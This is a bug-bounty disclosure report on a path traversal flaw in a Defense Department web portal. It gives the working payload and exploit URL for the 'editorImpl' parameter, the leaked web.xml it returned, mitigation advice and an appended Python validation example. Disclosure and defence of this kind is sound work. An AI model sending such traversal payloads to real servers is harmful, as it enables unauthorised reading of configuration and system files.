U.S. Dept Of Defense: Path traversal on ████████

2017-03-30T20:55:32
ID H1:217344
Type hackerone
Reporter twicedi
Modified 2019-10-04T15:23:01

Description

Summary: The web application hosted on the "█████████" domain is affected by a path traversal vulnerability that could permit an attacker to include arbitrary files located outside of the restricted directory.

Description: The affected handler is "/html/js/editor/editor.jsp". Through the "editorImpl" parameter, this handler receives user input that it uses to construct a pathname intended to identify a file, but the web app does not properly neutralize "dot-dot-slash (../)" sequences within that pathname. As a result the pathname can resolve to a location outside of the restricted directory, as shown in the following example, in which the web.xml configuration file is included:

Example of payload: ../../../WEB-INF/web.xml?

URL (note: the trailing question mark character ("?") is necessary to exploit the vulnerability; otherwise an error is triggered, with a full stack trace): https://████/html/js/editor/editor.jsp?editorImpl=../../../WEB-INF/web.xml?

```
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 30 Mar 2017 20:24:43 GMT
Connection: close
Content-Length: 54193

<?xml version="1.0"?>

<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.4" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<context-param>
    <param-name>contextClass</param-name>
    <param-value>com.liferay.portal.spring.context.PortalApplicationContext</param-value>
</context-param>
<context-param>
    <param-name>contextConfigLocation</param-name>
    <param-value/>
</context-param>
<context-param>
    <param-name>com.ibm.websphere.portletcontainer.PortletDeploymentEnabled</param-name>
    <param-value>false</param-value>
</context-param>
<filter>
    <filter-name>Absolute Redirects Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.absoluteredirects.AbsoluteRedirectsFilter</filter-class>
</filter>
<filter>
    <filter-name>Audit Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.audit.AuditFilter</filter-class>
</filter>
<filter>
    <filter-name>Auto Login Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.autologin.AutoLoginFilter</filter-class>
</filter>
<filter>

[REDACTED...]

<filter>
    <filter-name>GZip Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.gzip.GZipFilter</filter-class>
</filter>
<filter>
    <filter-name>GZip Filter - Theme PNG</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.gzip.GZipFilter</filter-class>
    <init-param>
        <param-name>url-regex-pattern</param-name>
        <param-value>.+/themes/.*/images/.*\.png</param-value>
    </init-param>
</filter>
<filter>
    <filter-name>Header Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.header.HeaderFilter</filter-class>
    <init-param>
        <param-name>url-regex-ignore-pattern</param-name>
        <param-value>.+/-/.+</param-value>
    </init-param>
    <init-param>
        <param-name>Cache-Control</param-name>
        <param-value>max-age=315360000, public</param-value>
    </init-param>
    <init-param>
        <param-name>Expires</param-name>
        <param-value>315360000</param-value>
    </init-param>
    <init-param>
        <param-name>Vary</param-name>
        <param-value>Accept-Encoding</param-value>
    </init-param>
</filter>
<filter>
    <filter-name>Header Filter - JSP</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.header.HeaderFilter</filter-class>
    <init-param>
        <param-name>url-regex-pattern</param-name>
        <param-value>.+/(barebone|css|everything|main)\.jsp</param-value>
    </init-param>
    <init-param>
        <param-name>Cache-Control</param-name>
        <param-value>max-age=315360000, public</param-value>
    </init-param>
    <init-param>
        <param-name>Expires</param-name>
        <param-value>315360000</param-value>
    </init-param>
    <init-param>
        <param-name>Vary</param-name>
        <param-value>Accept-Encoding</param-value>
    </init-param>
</filter>

[REDACTED...]

<filter>
    <filter-name>Minifier Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.minifier.MinifierFilter</filter-class>
</filter>
<filter>
    <filter-name>Minifier Filter - JSP</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.minifier.MinifierFilter</filter-class>
    <init-param>
        <param-name>url-regex-pattern</param-name>
        <param-value>.+/(barebone|css|everything|main)\.jsp</param-value>
    </init-param>
</filter>
<filter>
    <filter-name>Monitoring Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.monitoring.MonitoringFilter</filter-class>
</filter>
<filter>
    <filter-name>Secure Main Servlet Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.secure.SecureFilter</filter-class>
    <init-param>
        <param-name>portal_property_prefix</param-name>
        <param-value>main.servlet.</param-value>
    </init-param>
</filter>
<filter>
    <filter-name>Session Id Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.sessionid.SessionIdFilter</filter-class>
</filter>
<filter>
    <filter-name>SSO CAS Filter</filter-name>
    <filter-class>com.liferay.portal.servlet.filters.sso.cas.CASFilter</filter-class>
</filter>

[REDACTED...]

<filter-mapping>
    <filter-name>Sharepoint Filter</filter-name>
    <url-pattern>/sharepoint/_vti_bin/_vti_aut/author.dll</url-pattern>
</filter-mapping>
<filter-mapping>
    <filter-name>Sharepoint Filter</filter-name>
    <url-pattern>/sharepoint/_vti_bin/owssvr.dll</url-pattern>
</filter-mapping>
<filter-mapping>
    <filter-name>SSO CAS Filter</filter-name>
    <url-pattern>/c/portal/login</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
    <filter-name>SSO CAS Filter</filter-name>
    <url-pattern>/c/portal/logout</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
    <filter-name>SSO Ntlm Filter</filter-name>
    <url-pattern>/c/portal/login</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
    <filter-name>SSO Ntlm Post Filter</filter-name>
    <url-pattern>/*</url-pattern>
</filter-mapping>

[REDACTED...]

<filter-mapping>
    <filter-name>Monitoring Filter</filter-name>
    <url-pattern>/user/*</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
    <filter-name>Monitoring Filter</filter-name>
    <url-pattern>/web/*</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
<listener>
    <listener-class>com.liferay.portal.spring.context.PortalContextLoaderListener</listener-class>
</listener>
<listener>
    <listener-class>com.liferay.portal.servlet.PortalSessionListener</listener-class>
</listener>
<listener>
    <listener-class>com.liferay.portal.kernel.servlet.PortletSessionListenerManager</listener-class>
</listener>
<listener>
    <listener-class>com.liferay.portal.kernel.servlet.SerializableSessionAttributeListener</listener-class>
</listener>
<listener>
    <listener-class>com.liferay.portal.servlet.SharedSessionAttributeListener</listener-class>
</listener>
<servlet>
    <servlet-name>Web Server Servlet</servlet-name>
    <servlet-class>mil.army.lwn.liferay.portal.webserver.WebServerServlet</servlet-class>
    <load-on-startup>2</load-on-startup>
</servlet>
<servlet>
    <servlet-name>Main Servlet</servlet-name>
    <servlet-class>com.liferay.portal.servlet.MainServlet</servlet-class>
    <init-param>
        <param-name>config</param-name>
        <param-value>/WEB-INF/struts-config.xml,/WEB-INF/struts-config-ext.xml</param-value>
    </init-param>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>detail</param-name>
        <param-value>0</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
<servlet>
    <servlet-name>Combo Servlet</servlet-name>
    <servlet-class>com.liferay.portal.servlet.ComboServlet</servlet-class>
    <load-on-startup>2</load-on-startup>
</servlet>
<servlet>
    <servlet-name>Display Chart</servlet-name>
    <servlet-class>com.liferay.portal.servlet.DisplayChartServlet</servlet-class>
    <load-on-startup>2</load-on-startup>
</servlet>
<servlet>
    <servlet-name>Facebook Servlet</servlet-name>
    <servlet-class>com.liferay.portal.facebook.FacebookServlet</servlet-class>
    <load-on-startup>2</load-on-startup>
</servlet>
<servlet>
    <servlet-name>Friendly URL Servlet - Private Group</servlet-name>
    <servlet-class>com.liferay.portal.servlet.FriendlyURLServlet</servlet-class>
    <init-param>
        <param-name>private</param-name>
        <param-value>true</param-value>
    </init-param>
    <init-param>
        <param-name>user</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>2</load-on-startup>
</servlet>
<servlet>
    <servlet-name>Friendly URL Servlet - Private User</servlet-name>
    <servlet-class>com.liferay.portal.servlet.FriendlyURLServlet</servlet-class>
    <init-param>
        <param-name>private</param-name>
        <param-value>true</param-value>
    </init-param>
    <init-param>
        <param-name>user</param-name>
        <param-value>true</param-value>
    </init-param>
    <load-on-startup>2</load-on-startup>
</servlet>

[REDACTED...]

<servlet>
    <servlet-name>XML-RPC Servlet</servlet-name>
    <servlet-class>com.liferay.portal.xmlrpc.XmlRpcServlet</servlet-class>
    <load-on-startup>2</load-on-startup>
</servlet>
<servlet>
    <servlet-name>Clean Up Servlet</servlet-name>
    <servlet-class>com.liferay.portal.servlet.CleanUpServlet</servlet-class>
    <load-on-startup>3</load-on-startup>
</servlet>
<servlet-mapping>
    <servlet-name>Main Servlet</servlet-name>
    <url-pattern>/c/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>Combo Servlet</servlet-name>
    <url-pattern>/combo/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>Display Chart</servlet-name>
    <url-pattern>/display_chart/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>Facebook Servlet</servlet-name>
    <url-pattern>/facebook/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>Friendly URL Servlet - Private Group</servlet-name>
    <url-pattern>/group/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>Friendly URL Servlet - Private User</servlet-name>
    <url-pattern>/user/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>Friendly URL Servlet - Public</servlet-name>
    <url-pattern>/web/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>Google Gadget Servlet</servlet-name>
    <url-pattern>/google_gadget/*</url-pattern>
</servlet-mapping>

[REDACTED...]

<servlet-mapping>
    <servlet-name>Widget Servlet</servlet-name>
    <url-pattern>/widget/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
    <servlet-name>XML-RPC Servlet</servlet-name>
    <url-pattern>/xmlrpc/*</url-pattern>
</servlet-mapping>
<session-config>
    <session-timeout>120</session-timeout>
</session-config>
<welcome-file-list>
    <welcome-file>index.html</welcome-file>
    <welcome-file>index.jsp</welcome-file>
</welcome-file-list>
<error-page>
    <error-code>404</error-code>
    <location>/errors/404.jsp</location>
</error-page>
<jsp-config>
    <taglib>
        <taglib-uri>http://displaytag.sf.net</taglib-uri>
        <taglib-location>/WEB-INF/tld/displaytag.tld</taglib-location>
    </taglib>
    <taglib>
        <taglib-uri>http://java.sun.com/jsp/jstl/core</taglib-uri>
        <taglib-location>/WEB-INF/tld/c.tld</taglib-location>
    </taglib>
    <taglib>
        <taglib-uri>http://java.sun.com/jsp/jstl/fmt</taglib-uri>
        <taglib-location>/WEB-INF/tld/fmt.tld</taglib-location>
    </taglib>
    <taglib>
        <taglib-uri>http://java.sun.com/jsp/jstl/functions</taglib-uri>
        <taglib-location>/WEB-INF/tld/fn.tld</taglib-location>
    </taglib>

[REDACTED...]

    <taglib>
        <taglib-uri>http://struts.apache.org/tags-tiles</taglib-uri>
        <taglib-location>/WEB-INF/tld/struts-tiles.tld</taglib-location>
    </taglib>
    <taglib>
        <taglib-uri>http://struts.apache.org/tags-tiles-el</taglib-uri>
        <taglib-location>/WEB-INF/tld/struts-tiles-el.tld</taglib-location>
    </taglib>
</jsp-config>
<security-constraint>
    <web-resource-collection>
        <web-resource-name>/c/portal/protected</web-resource-name>
        <url-pattern>/c/portal/protected</url-pattern>
        <url-pattern>/ar/c/portal/protected</url-pattern>

[REDACTED...]

        <http-method>GET</http-method>
        <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
        <role-name>users</role-name>
    </auth-constraint>
    <user-data-constraint>
        <transport-guarantee>NONE</transport-guarantee>
    </user-data-constraint>
</security-constraint>
<login-config>
    <auth-method>FORM</auth-method>
    <realm-name>PortalRealm</realm-name>
    <form-login-config>
        <form-login-page>/c/portal/j_login</form-login-page>
        <form-error-page>/c/portal/j_login_error</form-error-page>
    </form-login-config>
</login-config>
<security-role>
    <role-name>users</role-name>
</security-role>

</web-app>
```

Impact

It may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration files and critical system files.

Step-by-step Reproduction Instructions

  1. It is possible to insert a malicious string as the "editorImpl" parameter of the following handler to access files that are outside of the restricted directory (note: the trailing question mark character ("?") is necessary to exploit the vulnerability; otherwise an error is triggered, with a full stack trace): https://██████████/html/js/editor/editor.jsp?editorImpl=../../../WEB-INF/web.xml?

Suggested Mitigation/Remediation Actions

It is advisable to:

- Prefer working without user input when using file system calls
- Use indexes rather than actual portions of file names when templating or using language files
- Ensure the user cannot supply all parts of the path: surround it with your own path code
- Validate the user's input by only accepting known good values; do not sanitize the data
- Use chrooted jails and code access policies to restrict where files can be read from or saved to
- If forced to use user input for file operations, normalize the input before using it in file I/O APIs

I'm available for further clarification,

Best, Davide
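As an added example (not part of the report or of the affected application), the following Python sketches the two controls the mitigation section recommends for the editorImpl parameter: accept only known-good editor names, and independently confirm that the canonical path stays under the editor directory. EDITOR_DIR and the KNOWN_EDITORS set are constructed assumptions; the real handler's file layout is not known from the report.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Directory the editor handler is meant to serve from. Constructed for this
# example to mirror the reported "/html/js/editor/" location; the real webroot
# on the affected host is not known.
EDITOR_DIR = "/srv/webapp/html/js/editor"

# Known-good editor names (assumption: the handler maps editorImpl to one of a
# fixed set of implementations). Accepting only these is the primary control.
KNOWN_EDITORS = {"ckeditor", "tinymce", "simple"}

# Identifier-like names only: no '/', '\\', '.', '?', '%' or whitespace.
SAFE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")


def is_confined(base_dir: str, candidate: str) -> bool:
    """Second layer: canonicalise the joined path (resolving '..' and symlinks)
    and require it to stay at or below base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, candidate))
    return target == base or target.startswith(base + os.sep)


def resolve_editor(base_dir: str, editor_impl: str) -> Optional[str]:
    """Return the file the handler may serve for editorImpl, or None to reject.

    Order matters: decode first so percent-encoded '../' cannot slip past the
    allow-list, then match against known good, then confirm confinement.
    """
    value = unquote(editor_impl)
    if not SAFE_NAME.fullmatch(value) or value not in KNOWN_EDITORS:
        return None
    if not is_confined(base_dir, value):
        return None
    return os.path.join(os.path.realpath(base_dir), value)


def escapes_base(base_dir: str, editor_impl: str) -> bool:
    """Audit helper: would this raw parameter value, used naively, leave
    base_dir? Handy as a regression test for the reported input."""
    return not is_confined(base_dir, unquote(editor_impl))


if __name__ == "__main__":
    # The reported payload (trailing '?' included) next to a legitimate value.
    for v in ("ckeditor", "../../../WEB-INF/web.xml?",
              "%2e%2e%2f%2e%2e%2f%2e%2e%2fWEB-INF%2fweb.xml%3f"):
        print(f"{v!r:55} escapes={escapes_base(EDITOR_DIR, v)} "
              f"resolved={resolve_editor(EDITOR_DIR, v)}")
```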